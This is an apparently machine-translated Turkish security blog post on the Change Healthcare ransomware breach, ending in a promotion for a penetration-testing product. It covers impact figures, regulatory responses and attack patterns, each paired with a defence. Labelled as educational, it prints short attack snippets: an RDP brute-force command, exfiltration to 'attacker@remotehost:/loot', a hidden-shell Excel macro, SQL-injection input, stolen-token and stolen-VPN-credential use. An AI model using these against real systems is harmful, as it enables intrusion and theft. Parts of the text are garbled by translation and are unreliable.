Değişim Sağlık Hizmetleri Siber Saldırı Güncellemesi Bugün: Devam Eden Krizin Anlık Görüntüsü
Change Healthcare siber saldırısı ilk olarak Şubat 2024 2025'te ve sonrasında siber güvenlik ve sağlık hizmetleri operasyonlarını şekillendirmeye devam ediyor. Başlangıçta önemli bir fidye yazılımı olayı olarak duyurulan saldırının o zamandan beri yaklaşık 193 milyon kişiyi etkilediBu da şimdiye kadar kaydedilen en büyük sağlık hizmeti veri ihlallerinden biri oldu. Veri kaybının ötesinde, saldırı ülke çapında takas merkezi ödeme sistemlerini, eczane talep işlemlerini ve klinik yetkilendirme akışlarını kesintiye uğratarak sağlık sektöründeki hem sistemik güvenlik açıklarını hem de belirgin operasyonel riskleri ortaya çıkardı.
Ne Olduğuna ve Neden Önemli Olduğuna Derinlemesine Bir Bakış
Açık 21 Şubat 2024UnitedHealth Group'un bir parçası ve ABD'deki en büyük sağlık hizmeti veri işlemcilerinden biri olan Change Healthcare, talep işleme, uygunluk doğrulama, eczane hizmetleri ve daha fazlasını destekleyen kilit sistemleri felç eden bir fidye yazılımı saldırısını keşfetti. healthplan.org Bu, tek bir hastaneyi veya muayenehaneyi etkileyen yerel bir ihlal değildi: Change Healthcare'in altyapı süreçleri Yılda 15 milyar sağlık hizmeti işlemi ve Amerika Birleşik Devletleri'ndeki tüm hasta etkileşimlerinin önemli bir kısmına dokunmaktadır. Amerikan Hastaneler Birliği
Saldırının sorumlusu ALPHV/BlackCat fidye yazılımı grubuChange Healthcare'in altyapısının büyük bölümünü şifreleyerek yaygın kesintilere ve operasyonel aksamalara neden oldu. Bir noktada, sağlayıcılar elektronik talep gönderemedi, eczaneler sigorta yoluyla reçeteleri doğrulayamadı ve birçok hasta cepten ödeme yapmak veya bakımı ertelemek zorunda kaldı. healthplan.org
İlk tahminler ihlalin yaklaşık 100 milyon kişiyi etkilediğini gösteriyordu, ancak 2025 yılına gelindiğinde nihai rakam yaklaşık 192,7 milyon etkilenen kişi-ABD nüfusunun neredeyse üçte ikisi.

İhlal Sağlık Hizmetleri BT'sindeki Kritik Zafiyetleri Nasıl Ortaya Çıkardı?
Change Healthcare'in merkezi bir takas merkezi olarak rolü, sistemleri çöktüğünde etkinin sağlık hizmetleri operasyonlarının neredeyse her katmanına yayılması anlamına geliyordu. Amerikan Hastaneler Birliği (AHA) tarafından yapılan bir ankete göre:
- 74% Hastanelerin çoğu, tıbbi açıdan gerekli izinlerin verilmesinde yaşanan gecikmeler de dahil olmak üzere hasta bakımının doğrudan etkilendiğini bildirmiştir.
- 94% iş akışı kesintileri nedeniyle mali etkiler bildirmiştir.
- 33% gelirlerinin yarısından fazlasının kesintiye uğradığını söyledi.
- 60% Sistemler tekrar çevrimiçi hale geldiğinde normal operasyonlara dönmek için iki hafta ila üç ay arasında bir süre gerekmiştir. Amerikan Hastaneler Birliği
Bu istatistikler, saldırının sadece arka uç veritabanlarını etkileyen bir veri ihlali olmadığını ortaya koymaktadır. sağlik hi̇zmeti̇ sunumu ve sağlik yöneti̇mi̇ni̇n her köşesi̇ni̇ etki̇leyen operasyonel kri̇z.
Aylar sonra bile, daha küçük muayenehaneler, geciken hasar geri ödemeleri ve maaş bordrosu ve hizmetleri tehlikeye atan nakit akışı sıkıntıları da dahil olmak üzere aşağı yönlü etkilerle mücadele etti. PYMNTS.com
Veri İfşası: Ne Alındı ve Neden Önemli?
Saldırganlar Change Healthcare'in sistemlerine girdikten sonra büyük miktarda hassas bilgiyi dışarı sızdırmayı başardılar. Şirket açıklamalarına ve harici siber güvenlik raporlarına göre:
- Korunan Sağlık Bilgileri (PHI)Hasta tanıları, tedavi planları, ilaç geçmişleri ve test sonuçları.
- Kişisel Olarak Tanımlanabilir Bilgiler (PII): isimler, adresler, doğum tarihleri, Sosyal Güvenlik numaraları.
- Finans ve Sigorta Verileri: plan kimlikleri, fatura kodları, talep kayıtları, ödeme geçmişleri. Malwarebytes
Bu kadar ayrıntılı PHI ve PII'nin dışarı sızması, HIPAA kapsamındaki düzenleyici yükümlülükleri tetiklemekten daha fazlasını yapar; kimlik hırsızlığı, tıbbi dolandırıcılık ve sağlık kayıtlarının ikincil piyasalarda kötüye kullanılması gibi uzun vadeli riskler taşır.
Aşağıdakiler de dahil olmak üzere federal düzenleyiciler HHS Sivil Haklar Ofisi (OCR)üçüncü taraflar etkilenen kapsam dahilindeki kuruluşlar adına sosyal yardımda bulunsa bile ihlal bildirim yükümlülüklerinin hala geçerli olduğunu yinelemiştir.

Son Düzenleyici ve Yasal Tepkiler
İhlal sadece federal kurumların dikkatini çekmekle kalmadı, aynı zamanda yasal işlemleri de tetikledi. Örneğin, Nebraska Başsavcısının açtığı davada Change Healthcare'in endüstri standardı güvenlik önlemlerini ve ağ segmentasyonunu uygulamadığı, bunun da ihlalin boyutuna ve uzun süreli kesintiye katkıda bulunduğu iddia ediliyor. HIPAA Dergisi
Bu arada HHS OCR, Change Healthcare, kapsam dahilindeki kuruluşlar ve düzenleyiciler arasındaki koordineli iletişimi vurgulayarak HIPAA kuralları kapsamında ihlal bildirimlerine ilişkin sorumlulukları netleştirmeye devam etmektedir.
Olay, federal politika düzeyinde, sağlık hizmetlerinde üçüncü taraf risk yönetimine yönelik ulusal standartların güçlendirilmesi tartışmalarını alevlendirdi ve bu konu şu anda sağlık sistemleri ve yasama komitelerinin gündeminde.
Gözlemlenen Gerçek Saldırı Kalıpları ve Fidye Yazılımı Teknikleri
Saldırganların bu olayda nasıl hareket ettiklerini anlamak, savunucuların gelecekteki savunmalarını şekillendirmelerine yardımcı olur. Change Healthcare ihlali, gelişmiş fidye yazılımı kampanyalarında görülen teknikleri içeriyordu:
Saldırı Modeli #1: Güvenliği Aşılmış Uzaktan Erişim
Birçok büyük ihlal, uzaktan erişim portallarının tehlikeye girmesiyle başlar. Change Healthcare'in durumunda, ABD Senatosu önünde kamuya açıklanan ifadede şunlar belirtilmiştir Çok faktörlü kimlik doğrulama (MFA) olmadan Citrix uzaktan erişim ilk ağ erişiminde bir faktör olmuştur. Nixon Peabody LLP
İşte simüle edilmiş bir kaba kuvvet örneği (eğitim amaçlı):
bash
#Educational brute force simulation against RDP porthydra -L users.txt -P rockyou.txt rdp://changehealthcare.example.com
Savunma: Bu tür girişimleri engellemek için çok faktörlü kimlik doğrulamayı zorunlu kılın ve hesap kilitleme politikaları uygulayın.
powershell
MFA'yı Etkinleştirme (Windows) Set-UserMFAPreference -Identity "Admin" -Enabled $true
Saldırı Örüntüsü #2: Kimlik Avı Yoluyla Kimlik Bilgisi Toplama
Fidye yazılımı grupları genellikle kimlik avı kampanyalarından şirket içi fidye yazılımı dağıtımına geçiş yapar:
html
<input type="text" name="username">
<input type="password" name="password">
<input type="submit"></form>
Savunma: İlk erişimi önlemek için e-posta filtreleme, kullanıcı eğitimi ve bağlantı davranış analizi uygulayın.
Saldırı Modeli #3: Çifte Gasp ve Veri Sızıntısı
Bu modern teknik sistemleri şifrelemekte ve aynı zamanda çalınan verileri yayınlamakla tehdit etmektedir:
bash
Toplu veri sızıntısının eğitsel simülasyonucp -r /SensitiveData attacker@remotehost:/loot
Savunma: Yetkisiz aktarımları belirlemek ve engellemek için veri kaybı önleme (DLP) araçlarını ve aktarım sırasında şifreleme tespitini kullanın.
Saldırı Modeli #4: Fidye Yazılımı Şifreleme Döngüsü
Fidye yazılımı bir kez kurulduktan sonra tüm dosya depolarını şifreleyebilir:
powershell
Varsayımsal şifreleme döngüsü (eğitim)Get-ChildItem -Path C:\\Data | ForEach-Object { Encrypt-File -Path $_.FullName -Key $key}
Kritik sistemlerin izole edilmesi ve dosya değişim modellerinin izlenmesi temel savunmalardır.
Saldırı Örüntüsü #5: Talep İşleme API'lerinde SQL Enjeksiyonu
Fidye yazılımı ve sızma kampanyaları sırasında saldırganlar genellikle şunları arar güvensiz uç noktalar sağlık hizmeti sağlayıcı API'lerinde. Change Healthcare benzeri uç noktaları etkileyen varsayımsal bir senaryo SQL enjeksiyonunu içerebilir:
python
#Python örneği: Güvenli olmayan SQL sorgusu (eğitim) import sqlite3 conn = sqlite3.connect('claims.db') cursor = conn.cursor() user_input = "1 OR 1=1" # Kötü niyetli inputquery = f "SELECT * FROM claims WHERE patient_id = {user_input};" cursor.execute(query)
Savunma: Enjeksiyonu önlemek için her zaman parametrelendirilmiş sorgular kullanın:
python
#Safe SQL querycursor.execute("SELECT * FROM claims WHERE patient_id = ?", (user_input,))
Bu, saldırganların manipüle edilmiş girdiler yoluyla tüm veritabanlarını almasını engeller.
Saldırı Örüntüsü #6: Tıbbi Faturalama Belgelerinde Kötü Amaçlı Makro
Saldırganlar genellikle ödeme yüklerini Excel makroları sağlayıcılara gönderilen fatura belgelerine yerleştirilmiştir:
vb
' Excel VBA makrosu (eğitim) Sub AutoOpen() Shell "powershell.exe -Command Start-Process cmd.exe", vbHideEnd Sub
Savunma: Varsayılan olarak makroları devre dışı bırakın ve belge kaynaklarını doğrulayın:
powershell
Makro güvenlik ilkesini zorla Set-ExecutionPolicy RemoteSigned -Scope CurrentUser
Bu, güvenilir kaynaklar tarafından imzalanmış meşru komut dosyalarına izin verirken keyfi makro yürütmeyi engeller.
Saldırı Örüntüsü #7: API Token Hırsızlığı ve Yetkisiz Erişim
Güvenliği ihlal edilmiş API belirteçleri, saldırganların hasta veya talep verilerine erişmesine olanak sağlayabilir:
bash
#Simüle edilmiş token yeniden kullanım saldırısı (eğitim)curl -H "Authorization: Bearer stolen_token_here" <https://api.changehealthcare.example.com/claims>
Savunma: API anahtarlarını sık sık döndürün, kapsamlarla OAuth'u zorlayın ve anormal API isteklerini izleyin:
python
#oken doğrulama sözde kodu
if not verify_token(token) or token.is_revoked:
raise UnauthorizedError("Geçersiz veya iptal edilmiş token")
2025 Sağlık Hizmetleri Siber Saldırıları: Sağlık Hizmetlerini Değiştirmenin Ötesinde Gerçek Dünya Örnekleri
Change Healthcare son yıllarda sağlık alanında yaşanan en önemli siber olay olmaya devam ediyor, 2025 şimdiden aynı yapısal zayıflıkları yansıtan çok sayıda gerçek dünya saldırısı üretti: merkezi platformlar, zayıf kimlik kontrolleri, aşırı güvenilen API'ler ve gecikmeli tespit.
Bu davalar önemli çünkü şunu gösteriyorlar Change Healthcare'in arkasındaki saldırı modelleri münferit değildiancak daha geniş ve hızlanan bir eğilimin parçasıdır.
Vaka 1 (2025): Bölgesel Bir Sağlık Ağında Çalınan VPN Kimlik Bilgileri Aracılığıyla Fidye Yazılımı
2025 yılının başlarında, çok eyaletli bölgesel bir sağlık hizmetleri ağı, fidye yazılımı saldırısının üçüncü taraf bir satıcı ihlalinden yeniden kullanılan çalıntı VPN kimlik bilgileri. Saldırganlar, çevre savunmalarını tamamen atlayarak meşru bir şekilde oturum açmış, ardından fidye yazılımını dağıtmadan önce yaklaşık iki hafta boyunca şirket içinde keşif yapmıştır.
Bu olay, Change Healthcare erişim modeline çok benziyor: sıfırıncı gün istismarı yok, egzotik kötü amaçlı yazılım yok - sadece Yetersiz erişim segmentasyonu ile birlikte kimlik bilgilerinin kötüye kullanılması.
Gözlemlenen saldırı davranışı (basitleştirilmiş simülasyon):
bash
1TP5Güvenliği ihlal edilmiş kimlik bilgilerini kullanarak meşru VPN erişimiopenvpn --config corp-vpn.ovpn --auth-user-pass stolen_creds.txt
Saldırganlar içeri girdikten sonra dahili hizmetleri listeledi:
bash
nmap -sT 10.10.0.0/16
2025 savunma dersi: VPN erişimine güvenen kuruluşlar, kimlik bilgilerini varsayılan olarak ihlal edilebilir. Koşullu erişim, MFA uygulaması, cihaz duruş kontrolleri ve sürekli oturum yeniden doğrulama artık isteğe bağlı sertleştirme değil, masaya yatırılan bahislerdir.
Vaka 2 (2025): Bir Sağlık Hizmetleri Takas Merkezi Entegrasyonunda API Suistimali
Bir başka 2025 vakası, saldırganların sağlık hizmetleri faturalandırma platformunu kötüye kullandığı bir vakayı içeriyordu aşırı ayrıcalıklı API belirteçleri talep mutabakatı için kullanılır. Hiçbir şifreleme kırılmamıştır. Bunun yerine, "salt okunur mutabakat" için verilen belirteçler, büyük hacimlerde PHI'yi çıkarmak için sessizce yeniden kullanıldı.
Bu başarısızlık sınıfı özellikle Değişim Sağlık Hizmetleri ile ilgilidir. Sağlayıcılar, ödeyiciler ve takas odaları arasındaki API güven ilişkileri kapsamlı ve uzun ömürlüdür.
Gözlemlenen kötüye kullanım modeli (eğitim):
curl -H "Authorization: Bearer valid_but_overprivileged_token" \\ <https://api.billing.example.com/v1/claims?from=2023>
Belirteç geçerli olduğu için, günlük sistemleri olağandışı hacim modelleri ortaya çıkana kadar etkinliği işaretlemedi.
Savunma kontrolü 2025 yılında giderek daha fazla benimsenmiştir:
python
#Enforcing scoped access and volume limits if request.scope not in ["claims:read:self"]: deny() if request.rate > baseline_rate: trigger_alert()
2025 savunma dersi: Sağlık hizmeti API'leri benimsemelidir en az ayrıcalıklı kapsamlar, kısa ömürlü belirteçler ve davranışsal oran temelleri. Telemetri içermeyen statik API anahtarları artık savunulamaz.
Vaka 3 (2025): Tıbbi Yazılım Güncellemeleri Yoluyla Tedarik Zinciri İstismarı
2025 yılının ortalarında, bir sağlık hizmeti SaaS sağlayıcısı, saldırganların bir sağlık hizmetinin içine kötü niyetli bir mantık yerleştirdiğini açıkladı. CI/CD boru hattı bağımlılığıdaha sonra rutin güncellemeler sırasında aşağı akış sağlayıcı ortamlarına dağıtıldı.
Bu vaka ilk başta fidye yazılımı içermiyordu. Bunun yerine, saldırganlar şunlara odaklandı Sessiz veri erişimi ve kimlik bilgisi toplamaBu da tespit edilmesini aylarca geciktiriyor.
Basitleştirilmiş tedarik zinciri saldırı modeli:
bash
#Malicious bağımlılığı tanıtıldı upstreamnpm install analytics-helper@latest
Kötü amaçlı kod dağıtıldıktan sonra ortam sırlarını sessizce iletti.
Modern 2025 savunma tepkisi:
bash
#Enforcing dependency integritynpm audit cosign verify --key trusted.pub container-image
2025 savunma dersi: Sağlık hizmeti sağlayıcıları hasta güvenli̇ği̇ altyapisi olarak yazilim tedari̇k zi̇nci̇ri̇ güvenli̇ği̇. SBOM'lar, bağımlılık imzalama ve boru hattı izleme artık deneysel uygulamalar değil, düzenleyici beklentilerdir.
Vaka 4 (2025): Sağlık Hizmetleri Finans Ekiplerini Hedef Alan Yapay Zeka Destekli Kimlik Avı
2025'teki dikkate değer bir eğilim de Sağlık hizmetleri finansmanı ve gelir döngüsü personeline göre uyarlanmış yapay zeka tarafından oluşturulmuş kimlik avı e-postaları. Daha önceki kimlik avı kampanyalarının aksine, bu mesajlar şirket içi terminoloji, faturalama döngüleri ve hatta belirli ödeme yapan iş akışlarıyla yakından eşleşiyordu.
Bazı sağlık kuruluşları, saldırganların bu e-postaları aşağıdakiler için kullandığını bildirmiştir talep işleme sistemleri için hasat kimlik bilgileridaha sonra doğrudan fidye yazılımı yerine veri satışı yoluyla para kazanmıştır.
Basitleştirilmiş kimlik avı yükü örneği (eğitim amaçlı):
html
<form action="/internal/billing-review">
<input name="username">
<input name="password"></form>
Savunma kontrolü 2025'te ilgi çekmeye başladı:
bash
#Davranışsal e-posta analizi (kavramsal) if email.semantic_similarity > threshold and sender_untrusted: quarantine()
2025 savunma dersi: Statik kimlik avı tespiti artık yeterli değil. Sağlık kuruluşları şunları birleştirmelidir kullanıcı davranış analitiği, semantik analiz ve sürekli kimlik bilgisi risk puanlaması.
Sağlık Hizmeti Sağlayıcıları Üzerindeki Operasyonel ve Mali Etkiler
Birçok klinik ve hastane için bu ihlal sadece bir siber güvenlik olayı değil, aynı zamanda finansal bir krizdi. Elektronik talep sistemlerine erişimleri olmayan tedarikçiler manuel süreçlere veya geçici çözümlere geri dönmek zorunda kaldılar, bu da geri ödemeleri geciktirdi ve nakit akışlarını zorladı. PYMNTS.com
Massachusetts gibi eyaletlerde yapılan araştırmalar, kuruluşlar geciken gelir akışlarıyla ayakta kalmaya çalışırken günlük mali kayıpların milyonları bulduğunu gösteriyor. Reddit
Aşağıdakiler de dahil olmak üzere federal yardım çabaları Medicare avans ödemeleri kesintiden etkilenen uygun sağlayıcılara mali açığı hafifletmek için uygulanmıştır, ancak bunlar zaman içinde geri ödenmesi gereken geçici çözümlerdir. cmadocs.org
Değişim Sağlık Hizmetleri Saldırısı 2025'te Neden Hala Yankılanıyor?
İlk olayın üzerinden bir yıldan fazla bir süre geçtikten sonra, sağlık hizmetleri liderleri ve siber güvenlik uzmanları Change Healthcare ihlalini, sağlık hizmetleri BT tedarikçilerinin klinik operasyonları ve veri işlemeyi destekleme biçimindeki yapısal zayıflıkları ortaya çıkaran önemli bir olay olarak görüyor. Amerikan Hastaneler Birliği
Kritik olarak, satıcı yoğunlaşma riskleri-Bir üçüncü taraf sağlayıcının iş akışlarının büyük bir çoğunluğuna dokunduğu durumlarda, tek bir ihlalin tüm sektörde çok büyük sonuçları olduğu anlamına geliyordu. Amerikan Hastaneler Birliği
Penligent.ai: Otomatik Sızma Testi ve Esneklik Testi için Modern Bir Araç
Bu tür sistemik tehditler karşısında kuruluşlar şunları araştırıyor otomatik sızma testi platformları geleneksel güvenlik uygulamalarını güçlendirmek için. Penligent.ai güvenlik ekiplerinin gizli güvenlik açıklarını keşfetmesine ve saldırganlar bunları kullanmadan önce hafifletmeleri doğrulamasına yardımcı olmak için yapay zeka destekli keşif, fuzzing ve istismar senaryosu oluşturmayı entegre eden böyle bir platformdur.
Penligent.ai'in yetenekleri şunları içerir:
- API'ler ve eski sistemler için otomatik yüzey haritalama ve protokol bulanıklaştırma.
- Gerçek dünya tehdit modellerine dayalı olarak güvenlik açıklarının akıllı önceliklendirilmesi.
- Bulguları çapraz ilişkilendirmek ve kalıpları geniş ölçekte tespit etmek için SIEM/EDR ile entegrasyon.
Güvenlik ekipleri, Change Healthcare ihlalinde görülenlere benzer saldırı vektörlerini (uzaktan erişim zayıflıkları veya sızma kanalları gibi) simüle ederek daha güçlü savunmalar oluşturabilir ve yıkıcı üçüncü taraf tehlikesi olasılığını azaltabilir.
Uygulamada, aşağıdaki yöntemleri kullanan kuruluşlar Penligent.ai sızma testi döngülerini hızlandırmış ve aksi takdirde gerçek bir ihlal gerçekleşene kadar keşfedilemeyecek koşulları ortaya çıkarmıştır.
Çıkarılan Dersler ve Gelecekteki Yönelimler
Siber güvenlik liderleri bu ihlal üzerine düşünürken ortaya birkaç tema çıkıyor:
- Sıfır Güven Varsayılan Hale Gelmelidir: Geleneksel çevre savunmaları yetersizdir. Kimlik merkezli savunma yanal hareketi azaltır.
- Satıcı Risk Yönetiminde Reform Gerekiyor: Yedeklilik olmadan tek bir takas merkezine güvenmenin maliyetli olduğu kanıtlanmıştır.
- Siber Hijyen İsteğe Bağlı Olamaz: MFA, yama ve segmentasyon gibi temel adımlar birçok saldırı yoluna karşı koruma sağlar.
Sektör analistlerinden editoryal not: "Bir zamanlar 'BT kesintisi' olarak düşünülen şey artık açıkça bir görev açısından kritik ulusal altyapı olayı. Sağlık sektörü, siber güvenliği yardımcı evrak işleri olarak değil, temel hasta güvenliği olarak ele almalıdır."
Sonuç: Bugünkü Güncelleme Sağlık Hizmetleri İçin Ne Anlama Geliyor?
Bugünkü Change Healthcare siber saldırı güncellemesi sadece bir durum raporu değil, birbirine son derece bağlı ve veri yoğun bir sektörde gelişen siber riskin bir yansımasıdır. İle yaklaşık 193 milyon kişi etkilendiuzun vadeli operasyonel etkiler, yasal ve düzenleyici incelemeler ve devam eden kurtarma çabaları nedeniyle bu ihlal, daha güçlü sağlık hizmetleri güvenlik uygulamaları için bir uyarı hikayesi ve katalizör olarak yıllarca incelenecektir.
Güvenlik uzmanları, operasyon liderleri ve politika yapıcılar için ileriye giden yol, savunma otomasyonuna daha fazla yatırım yapılmasını, satıcıların titizlikle denetlenmesini ve yarının tehditlerine dayanabilecek esnek mimarileri içermektedir.
Otorite ve Referans Bağlantıları
- Sağlık Hizmeti Yetkilisini Değiştirin SSS (HHS OCR): https://www.hhs.gov/hipaa/for-professionals/special-topics/change-healthcare-cybersecurity-incident-frequently-asked-questions/index.html
- AHA Siber Güvenlik Etkisi ve Yanıtları: https://www.aha.org/change-healthcare-cyberattack-underscores-urgent-need-strengthen-cyber-preparedness-individual-health-care-organizations-and
- İhlal Ölçeğinde Sağlık BT Haberleri: https://www.healthcareitnews.com/news/new-numbers-change-healthcare-data-breach-193-million-affected

